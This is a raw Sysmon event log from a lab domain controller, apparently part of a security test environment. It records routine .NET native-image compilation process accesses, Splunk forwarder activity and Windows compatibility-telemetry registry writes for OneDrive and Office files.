14:58:54.763{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-330F-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.731{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=307BC0526B96D8A6D30C659F10D0E6F2,SHA256=B07856A7A760E8D9C70934DEE70F7B0D401C94F47A5048EBC95C3515FBCCB36E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.700{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-320F-00000000BB01}6588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.700{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-320F-00000000BB01}6588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.700{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-320F-00000000BB01}6588C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.653{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-310F-00000000BB01}3104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.653{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-310F-00000000BB01}3104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.653{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-310F-00000000BB01}3104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.591{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-300F-00000000BB01}6080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.591{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-300F-00000000BB01}6080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.591{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-300F-00000000BB01}6080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.544{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-2F0F-00000000BB01}5416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.544{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-2F0F-00000000BB01}5416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.544{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-2F0F-00000000BB01}5416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.388{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2E-607E-2E0F-00000000BB01}5940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.372{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2E-607E-2E0F-00000000BB01}5940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:54.372{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2E-607E-2E0F-00000000BB01}5940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000081164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.356{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\BinProductVersion18.151.729.13 13241300x800000000000000081163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.356{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\LinkDate09/17/2018 17:44:14 13241300x800000000000000081162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.356{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\Publishermicrosoft corporation 13241300x800000000000000081161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.356{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\onedrivesetup.ex|13fa51f7fa101eb7\LowerCaseLongPathc:\program files\microsoft office\root\integration\addons\onedrivesetup.exe 13241300x800000000000000081160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.356{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\BinProductVersion16.0.13127.21210 13241300x800000000000000081159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.356{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\LinkDate02/05/2021 12:50:14 13241300x800000000000000081158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.356{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\Publishermicrosoft corporation 13241300x800000000000000081157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.356{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\integrator.exe|1b5d0d4b4f0be95e\LowerCaseLongPathc:\program files\microsoft office\root\integration\integrator.exe 13241300x800000000000000081156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.356{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplication\00001ce300114cd699a5ec1dc952222e119100000904\PublisherMicrosoft Corporation 13241300x800000000000000081155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.341{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\onedrivesetup.ex|789cb1de8c8294de\BinProductVersion18.151.729.13 13241300x800000000000000081154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.341{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\onedrivesetup.ex|789cb1de8c8294de\LinkDate09/17/2018 17:44:14 13241300x800000000000000081153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.341{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\onedrivesetup.ex|789cb1de8c8294de\Publishermicrosoft corporation 13241300x800000000000000081152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.341{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\onedrivesetup.ex|789cb1de8c8294de\LowerCaseLongPathc:\users\administrator\appdata\local\microsoft\onedrive\18.151.0729.0013\onedrivesetup.exe 13241300x800000000000000081151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.325{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\filesyncconfig.e|4703eb564c4346d9\BinProductVersion18.151.729.13 13241300x800000000000000081150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:54.325{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\filesyncconfig.e|4703eb564c4346d9\LinkDate09/17/2018 17:42:31 13241300x800000000000000081149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:54.325{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\filesyncconfig.e|4703eb564c4346d9\Publishermicrosoft corporation 13241300x800000000000000081148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:54.325{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\filesyncconfig.e|4703eb564c4346d9\LowerCaseLongPathc:\users\administrator\appdata\local\microsoft\onedrive\18.151.0729.0013\filesyncconfig.exe 13241300x800000000000000081147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:54.325{A7A01FEF-EC2C-607E-140F-00000000BB01}3596C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{63e00baf-5151-e001-a0c1-061cebf1cb2d}\Root\InventoryApplicationFile\filecoauth.exe|11eeeb6793d3440c\BinProductVersion18.151.729.13 13241300x800000000000000081146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 